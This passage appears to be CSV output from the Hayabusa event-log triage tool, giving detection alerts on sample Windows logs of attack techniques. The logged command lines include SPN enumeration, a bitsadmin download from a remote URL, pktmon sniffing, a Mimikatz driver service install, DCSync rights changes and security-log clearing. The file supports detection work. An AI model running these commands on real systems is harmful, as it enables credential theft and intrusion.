""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.686 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.702 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.702 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.702 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.717 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.717 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.733 +00:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.733 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN 
discovery (moder nPowerShell).evtx +2021-02-01 11:13:11.195 +00:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: setspn -T offsec -Q */* | Process: C:\Windows\System32\setspn.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x161c887 | PID: 3360 | PGUID: 7CF65FC7-E247-6017-0804-000000001B00 | Hash: SHA1=3B8C77CC25CF382D51B418CB9738BA99C3FDBAA9,MD5=C729DEA1888B1B047F51844BA5BD875F,SHA256=E3B06217D90BD1A2C12852398EA0E85C12E58F0ECBA35465E3DC60AC29AC0DC9,IMPHASH=6CBDE380709080AA31FA97FC18EF504E",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-01 11:13:11.195 +00:00,fs02.offsec.lan,1,medium,CredAccess,Possible SPN Enumeration,,rules/sigma/process_creation_sysmon/proc_creation_win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-03 15:17:15.901 +00:00,mssql01.offsec.lan,4688,low,Exec,Service Execution,,rules/sigma/process_creation_builtin/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx +2021-02-03 15:17:15.901 +00:00,mssql01.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx +2021-02-03 15:17:15.907 +00:00,mssql01.offsec.lan,4688,low,Exec,Service Execution,,rules/sigma/process_creation_builtin/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server 
started in single mode for psw recovery.evtx +2021-02-03 15:17:15.907 +00:00,mssql01.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx +2021-02-03 15:17:16.085 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d8 | User: MSSQL01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx +2021-02-03 15:33:16.107 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sqlcmd -S .\RADAR,2020 | Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\110\Tools\Binn\SQLCMD.EXE | PID: 0x1204 | User: admmig | LID: 0x372a4",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-sqlcmd tool abuse in SQL Server.evtx +2021-02-08 12:03:02.776 +00:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx +2021-02-08 12:06:15.608 +00:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use 
only Kerberos DES encryption types.evtx +2021-02-08 12:06:53.407 +00:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx +2021-02-08 13:00:32.783 +00:00,WIN10-client01.offsec.lan,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1564-Hide artifacts/ID4688-Linux Subsystem installation (WSL).evtx +2021-02-08 13:00:43.113 +00:00,WIN10-client01.offsec.lan,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1564-Hide artifacts/ID4688-Linux Subsystem installation (WSL).evtx +2021-02-08 13:01:11.198 +00:00,WIN10-client01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\WINDOWS\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b1c | User: WIN10-CLIENT01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1564-Hide artifacts/ID4688-Linux Subsystem installation (WSL).evtx +2021-02-22 22:18:08.605 +00:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-22 22:18:08.605 +00:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync 
AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-22 22:35:11.993 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-22 22:35:20.786 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-22 22:57:19.435 +00:00,jump01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2004-Any any firewall rule created.evtx +2021-02-22 23:07:20.794 +00:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: bitsadmin /transfer hackingarticles https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg c:\ignite.png | Path: C:\Windows\System32\bitsadmin.exe | PID: 0x1e00 | User: admmig | LID: 0x92e21,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx +2021-02-22 23:07:20.794 +00:00,jump01.offsec.lan,4688,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation_builtin/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx 
+2021-02-22 23:07:21.043 +00:00,jump01.offsec.lan,3,low,Evas | Persis,Suspicious Task Added by Bitsadmin,,rules/sigma/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx +2021-02-22 23:07:21.231 +00:00,jump01.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: hackingarticles | URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx +2021-02-22 23:08:02.534 +00:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c30 | User: JUMP01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx +2021-03-03 10:24:12.402 +00:00,jump01.offsec.lan,7045,info,Persis,Service Installed,"Name: Microsoft Office Click-to-Run Service | Path: ""C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"" /service | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-03 10:33:48.102 +00:00,jump01.offsec.lan,7045,info,Persis,Service Installed,"Name: Microsoft Search in Bing | Path: ""C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe"" | Account: LocalSystem | Start Type: auto 
start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-15 18:49:21.017 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:49:23.184 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: ab170ec9.png | URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:52:31.347 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:52:33.804 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:53:18.009 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:53:51.796 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:53:52.751 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:54:15.647 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: efc1a28b.png | URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:55:38.049 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe | URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 19:01:32.985 
+00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe | URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 15:50:54.591 +00:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: Npcap Packet Driver (NPCAP) | Path: \SystemRoot\system32\DRIVERS\npcap.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-25 21:56:19.530 +00:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon filter add -p 80 | Path: C:\Windows\System32\PktMon.exe | PID: 0x16d0 | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:56:19.530 +00:00,FX-BS7,4688,medium,CredAccess,Use of PktMon.exe,,rules/sigma/process_creation_builtin/proc_creation_win_lolbin_pktmon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:56:32.794 +00:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon comp list | Path: C:\Windows\System32\PktMon.exe | PID: 0x2b0c | User: admin | LID: 
0x977caa,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:56:32.794 +00:00,FX-BS7,4688,medium,CredAccess,Use of PktMon.exe,,rules/sigma/process_creation_builtin/proc_creation_win_lolbin_pktmon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:56:50.874 +00:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stpop | Path: C:\Windows\System32\PktMon.exe | PID: 0x2bdc | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:56:50.874 +00:00,FX-BS7,4688,medium,CredAccess,Use of PktMon.exe,,rules/sigma/process_creation_builtin/proc_creation_win_lolbin_pktmon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:56:53.090 +00:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stop | Path: C:\Windows\System32\PktMon.exe | PID: 0x1bc0 | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:56:53.090 +00:00,FX-BS7,4688,medium,CredAccess,Use of PktMon.exe,,rules/sigma/process_creation_builtin/proc_creation_win_lolbin_pktmon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 
21:57:05.324 +00:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: FX-BS7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:57:11.415 +00:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb60 | User: FX-BS7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-26 16:12:22.200 +00:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-26 16:12:22.200 +00:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account: | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-26 16:12:22.200 +00:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-26 16:12:22.201 +00:00,jump01.offsec.lan,13,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx +2021-03-26 16:17:29.210 +00:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-26 16:17:35.489 +00:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-26 16:17:35.489 +00:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account: | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-26 16:17:35.489 +00:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System 
Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-26 16:17:35.490 +00:00,jump01.offsec.lan,4697,info,Persis,Service Installed,Name: mimidrv | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | User: admmig | SrvAccount: LocalSystem | SrvType: 0x1 | SrvStartType: 2 | LID: 0xcc3c3,rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-26 16:17:35.490 +00:00,jump01.offsec.lan,4697,high,CredAccess | Exec,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-26 16:17:35.490 +00:00,jump01.offsec.lan,4697,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-26 16:36:00.106 +00:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: 